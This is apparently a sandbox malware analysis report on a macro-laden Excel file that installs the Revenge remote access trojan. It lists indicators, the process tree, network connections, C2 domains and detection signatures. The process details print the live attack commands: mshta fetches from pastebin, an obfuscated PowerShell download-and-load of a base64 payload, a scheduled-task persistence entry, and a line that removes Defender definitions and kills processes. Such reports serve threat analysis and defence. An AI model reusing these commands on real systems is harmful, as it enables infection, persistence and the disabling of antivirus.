analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

a7e995ce07b15912db89885111ece130b21f0a055050513f9fe159b5ba970bd1.xls

Full analysis: https://app.any.run/tasks/2c61fc20-4d26-4fc1-9505-1ee08afcc1e6
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Analysis date: May 21, 2019, 02:10:16
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
rat
revenge
maldoc-19
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sun May 12 09:20:42 2019, Security: 0
MD5:

8B651567787910ABCE75F760BF24C187

SHA1:

1F78C638AB820741ABE09D9098BC50309B1F689F

SHA256:

A7E995CE07B15912DB89885111ECE130B21F0A055050513F9FE159B5BA970BD1

SSDEEP:

768:twfZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAKb4HvfNU3c2JHM:efZ+RwPONXoRjDhIcp0fDlaGGx+cL26X

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2140)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EXCEL.EXE (PID: 2140)
    • Changes settings of System certificates

      • mshta.exe (PID: 2732)
    • Executes PowerShell scripts

      • mshta.exe (PID: 3592)
    • Changes the autorun value in the registry

      • mshta.exe (PID: 3592)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3036)
    • Uses Task Scheduler to run other applications

      • mshta.exe (PID: 3592)
    • Uses TASKKILL.EXE to kill antiviruses

      • cmd.exe (PID: 3132)
    • REVENGE was detected

      • powershell.exe (PID: 3228)
    • Connects to CnC server

      • powershell.exe (PID: 3228)
  • SUSPICIOUS

    • Application launched itself

      • mshta.exe (PID: 2732)
    • Creates files in the user directory

      • mshta.exe (PID: 2732)
      • mshta.exe (PID: 3592)
      • powershell.exe (PID: 3228)
    • Adds / modifies Windows certificates

      • mshta.exe (PID: 2732)
    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 3132)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • mshta.exe (PID: 2732)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 3592)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 3132)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2140)
    • Reads internet explorer settings

      • mshta.exe (PID: 2732)
      • mshta.exe (PID: 3592)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3228)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

Author: -
LastModifiedBy: -
Software: Microsoft Excel
CreateDate: 2006:09:16 00:00:00
ModifyDate: 2019:05:12 08:20:42
Security: None
CodePage: Windows Latin 1 (Western European)
AppVersion: 12
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • Sheet1
  • Sheet2
  • Sheet3
HeadingPairs:
  • Worksheets
  • 3
CompObjUserTypeLen: 38
CompObjUserType: Microsoft Office Excel 2003 Worksheet
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
49
Monitored processes
13
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe no specs mshta.exe mshta.exe cmd.exe no specs #REVENGE powershell.exe schtasks.exe no specs mpcmdrun.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2140"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
1
Version:
14.0.6024.1000
2732mshta http://www.bitly.com/2VhYVAXC:\Windows\system32\mshta.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3592"C:\Windows\System32\mshta.exe" http://pastebin.com/raw/4nM7u8J3C:\Windows\System32\mshta.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3132"C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & taskkill /f /im MSASCuiL.exe & taskkill /f /im MpCmdRun.exe & exitC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
128
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3228"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOEx $SA_s = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/Ta8gDg09'));$SA_s=$SA_s.replace('.','0');$SA_s = $SA_s.ToCharArray();[Array]::Reverse($SA_s);[byte[]]$Ci_W = [System.Convert]::FromBase64String($SA_s);$ASD_w = [System.Threading.Thread]::GetDomain().Load($Ci_W);$ASD_w.EntryPoint.invoke($S,$X);C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3036"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 20 /tn "AVAST Backup" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe http://pastebin.com/raw/qFauBX2v\",0,true)(window.close)" /F C:\Windows\System32\schtasks.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1136MpCmdRun.exe -removedefinitions -dynamicsignatures C:\Program Files\Windows Defender\MpCmdRun.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Malware Protection Command Line Utility
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3628taskkill /f /im winword.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3624taskkill /f /im excel.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3984taskkill /f /im MSPUB.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 167
Read events
972
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
16
Unknown types
0

Dropped files

PID
Process
Filename
Type
2140EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRFB07.tmp.cvr
MD5:
SHA256:
2732mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\error[1]
MD5:
SHA256:
2732mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\warning[1]
MD5:
SHA256:
3228powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4CAZT9IRICU9C1QZWI1C.temp
MD5:
SHA256:
2140EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF6927B97B8B23F76A.TMP
MD5:
SHA256:
2732mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\2905083093-widgets[1].jstext
MD5:D5554BC3E4DE42F271008E0A3B4EA92D
SHA256:E71B63863DFBD4B79FD95AE95D5A88F8AE781055DEF150B764C5D6C252E66C7B
2732mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bitly[1].txttext
MD5:08343A47254EA3EADD9CC5EE178C0235
SHA256:F98B89CDAA0A4A7A4EA17ADAFE20D357F78F0DDC782FD20948C38DF5B5F0FA96
2732mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\1961721879-ieretrofit[1].jshtml
MD5:2EB212E3AC3425A2A6BC22B4B1EEBF9D
SHA256:432D4759E839EAA812B10829AF91CFD71217D21244E9864700A8456DDA6DDC08
2732mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\error[1]text
MD5:35FE91C2AC1BA0913CC617622B9EB43F
SHA256:966240C0527B20E8E2553B7E5A68594AE69230AA00186F2C6C2C342405494837
1136MpCmdRun.exeC:\Users\admin\AppData\Local\Temp\MpCmdRun.logtext
MD5:E119243BE87DBDFD489CB01694264D22
SHA256:1D149B0E98A44A4F78BFA049518F15A2C3139416F1A93E3E86CBFE48143B8984
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
11
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2732
mshta.exe
GET
301
67.199.248.14:80
http://bitly.com/2VhYVAX
US
html
144 b
shared
3592
mshta.exe
GET
200
104.20.209.21:80
http://pastebin.com/raw/4nM7u8J3
US
html
6.60 Kb
shared
2732
mshta.exe
GET
301
67.199.248.14:80
http://www.bitly.com/2VhYVAX
US
html
178 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2732
mshta.exe
216.58.207.41:443
www.blogger.com
Google Inc.
US
whitelisted
2732
mshta.exe
172.217.18.161:443
lullimutterpeerbondibunbaba.blogspot.com
Google Inc.
US
whitelisted
3592
mshta.exe
104.20.209.21:80
pastebin.com
Cloudflare Inc
US
shared
2732
mshta.exe
67.199.248.14:80
www.bitly.com
Bitly Inc
US
shared
3228
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
3228
powershell.exe
216.170.122.10:3275
grace7011.sytes.net
ColoCrossing
US
malicious

DNS requests

Domain
IP
Reputation
www.bitly.com
  • 67.199.248.14
  • 67.199.248.15
shared
lullimutterpeerbondibunbaba.blogspot.com
  • 172.217.18.161
whitelisted
www.blogger.com
  • 216.58.207.41
shared
resources.blogblog.com
  • 216.58.207.41
whitelisted
pastebin.com
  • 104.20.209.21
  • 104.20.208.21
shared
grace7011.sytes.net
  • 216.170.122.10
malicious

Threats

PID
Process
Class
Message
2732
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2732
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
3592
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
3228
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Revenge-RAT CnC Checkin
3228
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
3228
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Revenge-RAT CnC Checkin
3228
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
3228
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
3228
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
3228
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
17 ETPRO signatures available at the full report
No debug info